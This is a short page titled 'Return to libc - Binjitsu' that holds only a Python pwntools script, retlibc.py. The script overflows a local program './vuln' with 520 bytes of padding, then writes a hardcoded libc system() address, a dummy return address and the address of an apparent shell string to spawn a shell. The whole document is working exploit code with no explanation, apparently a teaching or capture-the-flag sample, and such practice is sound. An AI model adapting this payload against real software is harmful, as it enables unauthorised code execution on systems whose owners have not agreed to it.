Return to libc - Binjitsu

retlibc.py

from pwn import *
p = process('./vuln')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
junk = 'A'*520
libc_sys = 0xb7e63170
retrn = 0xdeadbeef
shell = 0xbffffd5f
payload = junk+p32(libc_sys)+p32(retrn)+p32(shell)
print payload
p.send(payload)
p.recvline()